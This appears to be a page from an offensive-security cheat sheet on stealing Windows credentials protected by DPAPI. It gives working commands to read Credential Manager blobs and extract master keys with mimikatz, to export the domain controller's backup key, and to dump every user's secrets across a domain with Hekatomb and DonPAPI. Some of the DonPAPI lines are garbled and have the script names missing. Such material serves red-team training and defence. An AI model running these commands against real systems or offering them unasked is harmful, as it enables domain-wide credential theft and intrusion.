Microsoft Window's Data Protection API

Windows - DPAPI #

On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft’s Data Protection API and stored as “blob” files in user AppData folder.

Summary #

Data Protection API #

  • Outside of a domain: the user’s password hash is used to encrypt these “blobs”.
  • Inside a domain: the domain controller's master key is used to encrypt these blobs.

With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work
stations in the domain.

vaultcmd /list

VaultCmd /listcreds:<namevault>|<guidvault> /all
vaultcmd /listcreds:"Windows Credentials" /all

List Credential Files #

dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Mimikatz - Credential Manager & DPAPI #

# check the folder to find credentials
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*

# check the file with mimikatz
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
# find master key
mimikatz !sekurlsa::dpapi
# use master key
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b

# find and export backup keys
lsadump::backupkeys /system:dc01.lab.local /export
# use backup keys
dpapi::masterkey /in:"C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk

Hekatomb - Steal all credentials on domain #

Processus-Thief/Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.

pip3 install hekatomb
hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@ -debug -dnstcp

Data in memory

DonPAPI - Dumping DPAPI credz remotely # domain/user:passw0rd@target --hashes <LM>:<NT> domain/user@target

# using domain backup key backupkeys --export -t domain/user:passw0rd@target_dc_ip
python -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list

References #